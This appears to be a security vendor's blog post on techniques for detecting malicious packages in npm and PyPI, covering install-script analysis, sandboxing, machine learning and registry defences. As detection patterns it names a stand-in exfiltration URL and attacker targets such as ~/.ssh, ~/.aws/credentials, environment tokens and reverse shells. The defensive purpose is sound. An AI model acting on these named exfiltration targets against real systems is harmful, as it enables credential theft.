Open Source Security

Open Source Malware Detection Techniques for Package Registries

Malicious packages on npm, PyPI, and other registries are surging. Here are the techniques researchers and tools use to detect them.

Yukti Singhal
Security Researcher
6 min read

The volume of malicious packages published to open source registries exploded in 2022 and showed no signs of slowing in 2023. Sonatype reported a 742% increase in supply chain attacks between 2019 and 2022. npm, PyPI, and RubyGems were seeing thousands of malicious packages per month — typosquats, dependency confusion attacks, account takeovers, and outright malware.

The package registries are overwhelmed. They can't manually review every publication. Automated detection has become the primary defense, and the techniques being used are evolving rapidly.

Static Analysis Techniques

Install Script Analysis

The most common malicious behavior in npm packages is in postinstall scripts. Static analysis of install scripts looks for:

Network calls during installation: Legitimate packages rarely need to make HTTP requests during npm install. A postinstall script that calls https://attacker-server.com/exfil is highly suspicious.

Environment variable access: Malicious packages harvest environment variables to steal CI/CD tokens, cloud credentials, and API keys. Patterns like process.env combined with network calls are strong indicators.

File system access to sensitive locations: Reading ~/.ssh/, ~/.npmrc, ~/.aws/credentials, or browser cookie databases during installation is almost always malicious.

Obfuscation: Legitimate packages don't need to obfuscate their install scripts. Hex encoding, base64 encoding, eval() usage, and other obfuscation techniques in install scripts are red flags.

Code Pattern Matching

Beyond install scripts, static analysis of package source code looks for:

Data exfiltration patterns: Code that collects system information and sends it to an external server.

Reverse shell patterns: Code that establishes a network connection and binds it to a shell.

Cryptocurrency mining: Code that downloads and executes mining binaries.

Credential harvesting: Code that reads authentication files, browser storage, or keychain data.

Metadata Analysis

Package metadata itself contains useful signals:

Package name similarity: Comparing new package names against popular packages to detect typosquats. lodasg is suspicious because it's one character away from lodash.

Publisher history: A new publisher uploading 50 packages in one hour is likely conducting a typosquatting campaign.

Description and README content: Malicious packages often have minimal or copied descriptions.

Version patterns: A package that starts at version 99.0.0 might be targeting dependency confusion attacks.

Dynamic Analysis Techniques

Sandboxed Installation

Running npm install or pip install in an isolated sandbox and monitoring system behavior:

Network monitoring: Record all DNS queries and HTTP/HTTPS connections made during installation. Legitimate packages should make zero or minimal network connections during install.

File system monitoring: Track all file reads and writes. Reading SSH keys, browser data, or credential files is malicious.

Process monitoring: Track child processes spawned during installation. Executing binaries, especially downloaded ones, is suspicious.

System call tracing: Low-level monitoring of system calls made during package installation provides the most complete picture of package behavior.

Runtime Behavioral Analysis

Some malicious packages only activate their payload at runtime, not during installation. Behavioral analysis of imported packages looks for:

Delayed execution: Code that uses setTimeout or sleep before executing malicious behavior, designed to evade sandbox detection.

Environment-specific triggers: Code that only executes in CI/CD environments (checking for CI environment variables) or on specific operating systems.

Conditional activation: Code that checks IP ranges, hostnames, or other environmental factors before activating.

Machine Learning Approaches

Anomaly Detection

ML models trained on legitimate packages can identify anomalies in new publications:

  • Unusual code patterns compared to similar packages
  • Unexpected file types or structures
  • Network behavior that deviates from the package's stated purpose
  • Metadata patterns inconsistent with legitimate packages

Natural Language Processing

NLP techniques applied to package README files, descriptions, and documentation:

  • Detecting copied documentation from legitimate packages
  • Identifying descriptions that don't match the code's behavior
  • Flagging packages with auto-generated or nonsensical descriptions

Graph-Based Analysis

Analyzing the dependency graph for anomalies:

  • Packages that are dependencies of nothing (no legitimate package depends on them)
  • Circular dependency patterns designed to ensure installation
  • Sudden changes in the dependency graph of established packages

Registry-Level Defenses

npm

npm has invested in multiple layers of defense:

  • Automated malware detection scanning all new publications
  • Mandatory 2FA for high-impact packages
  • Token revocation when stolen tokens are detected
  • Community reporting mechanisms

PyPI

PyPI has implemented:

  • Mandatory 2FA for critical packages
  • Malware checks on new uploads
  • Trusted Publisher support (OIDC-based publishing from GitHub Actions)
  • Community reporting through the security@pypi.org channel

Sigstore Integration

Both npm and PyPI are integrating Sigstore for package provenance:

  • npm now publishes provenance attestations for packages built with GitHub Actions
  • PyPI's Trusted Publishers feature provides verifiable links between packages and their source repositories

What You Can Do

Before Installing

  1. Check the package name carefully — typosquats rely on speed and inattention
  2. Verify the publisher — check their history on the registry
  3. Check download counts and age — brand new packages with no downloads deserve scrutiny
  4. Read the source — for new or unfamiliar packages, review the code before installing
  5. Run npm audit or equivalent before adding new dependencies

After Installing

  1. Use lockfiles — they prevent silent package substitution
  2. Disable install scripts where possible — npm install --ignore-scripts
  3. Monitor for behavioral anomalies in your applications
  4. Regularly audit your dependency tree for packages you don't recognize

How Safeguard.sh Helps

Safeguard.sh employs multiple detection techniques to protect against malicious packages:

  • Multi-Layer Analysis: Safeguard.sh combines static analysis, metadata analysis, and behavioral signals to detect malicious packages before they enter your supply chain.
  • Typosquat Detection: Safeguard.sh compares your dependencies against known legitimate packages, flagging potential typosquats and name confusion attacks.
  • Continuous Monitoring: Safeguard.sh doesn't just check packages at install time — it continuously monitors your dependencies for newly discovered malicious behavior, catching packages that were initially clean but were later compromised.
  • Registry Intelligence: Safeguard.sh tracks malicious package campaigns across registries, providing early warning when attack patterns similar to known campaigns are detected.

The volume of malicious packages isn't going to decrease. The economics favor the attackers — publishing a malicious package costs nothing and takes seconds. Defending against them requires layered detection, continuous monitoring, and tools purpose-built for this threat.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.